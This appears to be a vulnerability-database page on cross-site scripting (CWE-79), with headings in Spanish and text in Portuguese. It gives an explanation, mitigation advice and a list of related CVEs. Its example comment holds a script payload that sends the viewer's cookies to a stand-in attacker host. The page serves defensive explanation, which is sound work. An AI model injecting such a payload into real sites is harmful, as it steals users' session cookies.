Fallos del tipo CWE-79

28.611 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2024-30920HIGHCross Site Scripting vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the render-document.phpEPSS 1.0%CVE-2023-28447HIGHCross site scripting vulnerability in Javascript escaping in smarty/smartyEPSS 1.0%CVE-2020-7318MEDIUMePolicy Orchistrator (ePO) - Cross-Site Scripting vulnerabilityEPSS 1.0%CVE-2021-41139HIGHReflected XSS vulnerability in time.phpEPSS 1.0%CVE-2020-2496—Cross-site scripting vulnerability in QTS and QuTS heroEPSS 1.0%CVE-2024-25412MEDIUMA cross-site scripting (XSS) vulnerability in Flatpress v1.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payloadEPSS 1.0%CVE-2024-57522MEDIUMSourceCodester Packers and Movers Management System v1.0 is vulnerable to Cross Site Scripting (XSS) in Users.php. An attacker can inject a EPSS 1.0%CVE-2021-41172MEDIUMSelf-XSS in AS_RedisEPSS 1.0%CVE-2025-64672HIGHMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 1.0%CVE-2017-16009—ag-grid is an advanced data grid that is library agnostic. ag-grid is vulnerable to Cross-site Scripting (XSS) via Angular Expressions, if AEPSS 1.0%CVE-2026-33346HIGHOpenEMR has stored XSS in portal_payment.php via Unescaped table_argsEPSS 1.0%CVE-2021-25929MEDIUMIn OpenNMS Horizon, versions opennms-1-0-stable through opennms-27.1.0-1; OpenNMS Meridian, versions meridian-foundation-2015.1.0-1 through EPSS 1.0%CVE-2020-8170—We have recently released new version of AirMax AirOS firmware v6.3.0 for TI, XW and XM boards that fixes vulnerabilities found on AirMax AiEPSS 1.0%CVE-2024-22927MEDIUMCross Site Scripting (XSS) vulnerability in the func parameter in eyoucms v.1.6.5 allows a remote attacker to run arbitrary code via craftedEPSS 1.0%CVE-2022-2627MEDIUMNewspaper < 12 - Reflected Cross-Site ScriptingEPSS 1.0%CVE-2017-15892—Multiple cross-site scripting (XSS) vulnerabilities in Slash Command Creator in Synology Chat before 2.0.0-1124 allow remote authenticated uEPSS 1.0%CVE-2023-26982MEDIUMTrudesk v1.2.6 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Add Tags parameter under the Create TickeEPSS 1.0%CVE-2022-25601MEDIUMWordPress Contact Form X plugin <= 2.4 - Reflected Cross-Site Scripting (XSS) vulnerabilityEPSS 1.0%CVE-2022-23519HIGHPossible XSS vulnerability with certain configurations of rails-html-sanitizerEPSS 1.0%CVE-2017-16010—i18next is a language translation framework. When using the .init method, passing interpolation options without passing an escapeValue will EPSS 1.0%